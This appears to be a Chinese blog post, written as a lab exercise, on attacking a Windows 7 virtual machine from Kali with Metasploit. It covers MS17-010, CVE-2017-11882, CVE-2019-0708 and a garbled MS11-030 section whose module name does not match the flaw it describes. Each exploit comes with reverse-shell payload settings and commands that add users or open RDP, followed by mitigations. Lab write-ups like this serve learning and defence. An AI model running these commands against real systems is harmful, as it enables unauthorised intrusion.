一.准备两台虚拟机，kali和win7，使用neuss和nmap对win7进行扫描

二.ms11_030

1.ms原理：在已经安装的 Windows DNS 客户端处理链路本地多播名称解析查询方式中的一个缺陷可被利用来在 NetworkSer11-030 DNS 解析中的漏洞可能允许远程代码执行vice 帐户的上下文中执行任意代码。如果攻击者获得对网络的访问权限，然后创建自定义程序以向目标系统发送特制的 LLMNR 广播查询，则该漏洞可能允许远程执行代码。
2.渗透过程
设置参数（payload，ip等）
use exploit/windows/browser/ms11_003_ie_css_import
set payload windows/meterpreter/reverse_tcp

3.Exploit后出现网站，win7访问

4.获取shell，ipconfig，发现可以添加用户

5.防御方案:
*在防火墙禁用TCP端口5355和UDP端口5355
*使用组策略禁用链接-本地多播名称解析
*关闭网络发现

三.MS17-010（Eternal blue永恒之蓝）

1.MS17-010
原理漏洞：永恒之蓝漏洞通过 TCP 的445和139端口，来利用 SMBv1 和 NBT 中的远程代码执行漏洞，通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网，即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。
2.渗透过程
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.1.33
set payload windows\x64\meterpreter\reverse_tcp
set lhost 192.168.1.12

3.攻击后，获取shell

4.预防方案
*关闭445端口
*开启防火墙，或者在高级中修改进出的端口信息
及时更新系统，打漏洞补丁

四.CVE-2017-11882

1.CVE-2017-11882
原理：OFFCIE中有一个文件是负责做公式编辑的文件EQNEDT32.EXE，该模块为公式编辑器，它以OLE技术将公式嵌入在Office文档，当插入和编辑数学公式时，EQNEDT32.EXE并不会被作为Office进程（如Word等）的子进程创建，而是以单独的进程形式存在。这就意味着对于WINWORD.EXE, EXCEL.EXE等Office进程的保护机制，无法阻止EQNEDT32.EXE这个进程被利用。由于该模块对于输入的公式未作正确的处理，攻击者可以通过刻意构造的数据内容覆盖掉栈上的函数地址，从而劫持程序流程，在登录用户的上下文环境中执行任意命令。
2.渗透过程
命令生成文档
python Command43b_CVE-2017-11882.py -c “cmd.exe /c net user xxx 123 /add” -o cve.doc

3.将ps_shell 移入攻击模块

4.重启apache服务

5.将cve.doc移入传win7中
6.设置参数（uripath，payload，lhost）
use exploit/windows/smb/cve_2017_11882
set payload windows/meterpreter/reverse_tcp
set URIPATH /

6.获取shell，可以创建用户（管理员权限）

7.预防措施
微软11月份的安全补丁已经修复了此漏洞。
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
开启Window Update功能, 定期对系统进行更新维护。
由于涉及模块已经很久未做更新,可能存在大量的安全漏洞,建议取消该模块的注册。
按下Win+R组合键，打开cmd.exe；
reg add “HKLMSOFTWAREMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

五.CVE-2019-0708

1.CVE-2019-0708
原理：漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞，跟之前的勒索，永恒之蓝病毒差不多。CVE-2019-0708漏洞是通过检查用户的身份认证，导致可以绕过认证，不用任何的交互，直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用，会导致服务器入侵，中病毒，像永恒之蓝漏洞一样大规模的感染。
渗透流程
2.在win7中开启3389端口‘
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’

3.设置参数

4.攻击后发现蓝屏

5.预防方案
*关闭3389端口或添加相应防火墙安全策略限制对3389端口的访问。
*升级操作系统至Windows 8及其以上版本。对于这些版本的Windows系统并不存在CVE-2019-0708漏洞。通过微软官网发布的漏洞补丁进行修复。Windows 7、Windows Server 2008和Windows Server 2008 R2：及时安装官方安全补丁。

对win7进行网络渗透相关推荐

安装Kali Linux操作系统Kali Linux无线网络渗透
安装Kali Linux操作系统Kali Linux无线网络渗透 Kali Linux是一个基于Debian的Linux发行版,它的前身是BackTrack Linux发行版.在该操作系统中,自带了大 ...
搭建渗透测试环境选自KaliLinux无线网络渗透测试教程
第1章搭建渗透测试环境许多提供安全服务的机构会使用一些术语,如安全审计.网络或风险评估.以及渗透测试.这些术语在含义上有一些重叠,从定义上来看,审计是对系统或应用的量化的技术评估.安全评估意为对风险 ...
win7映射网络驱动器消失了_驱动器出现问题怎么办_Win7系统映射网络驱动器出现故障如何解决...
2015-12-12 14:57:44 Win7映射网络驱动器出现故障怎么回事?最近有用户在win7系统内选择共享文件夹的时候发现映射网络驱动器出现故障,这是怎么回事呢?莫名其妙为什么Win7映射网络 ...
带你了解无线网络渗透测试——无线网络嗅探工具Kismet
如果要进行无线网络渗透测试,则必须先扫描所有有效的无线接入点.刚好在Kali Linux中,提供了一款嗅探无线网络工具Kismet.使用该工具可以测量周围的无线信号,并查看所有可用的无线接入点.本节将 ...
wdns服务器未响应,Win7系统网络诊断提示DNS服务器未响应的解决方法
Win7系统网络诊断提示DNS服务器未响应的解决方法昨天小编的朋友Win7系统网络诊断提示DNS服务器未响应的解决方法说,她win7系统电脑在开机的过程中,怎么都连接不上网络了,并且出现dns服 ...
[网络安全提高篇] 一〇四.网络渗透靶场Oracle+phpStudy本地搭建万字详解（SQL注入、XSS攻击、文件上传漏洞）
当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...
怎么在win7链接无线网络连接服务器,Win7系统网络连接一直显示正在获取网络地址但是连不上网解决方法...
电脑上不了网的原因很多,比如是网络设置问题.路由器问题.运营商问题.最近一个Win7用户,网络连接一直显示,正在获取网络地址但是连不上网,但是其它电脑可以上网,那么说明是电脑设置问题,那么该如何解决呢 ...
win7映射网络驱动器消失了_win7怎么映射网络驱动器|win7设置网络驱动器的方法...
2015-08-21 15:57:15 近来,有一些刚刚升级windows10系统的用户向小编咨询在新系统中该如何创建映射网络驱动器.其实,方法非常简单,接下来,小编就向大家分享win10系统创建映射 ...
win7 启用网络发现
win7 启用网络发现必须打开以下服务:dnscache(简写.fdrespub(简写).SSDP Discovery.UPnP Device Host.Computer Browser.Serve ...

对win7进行网络渗透

文章目录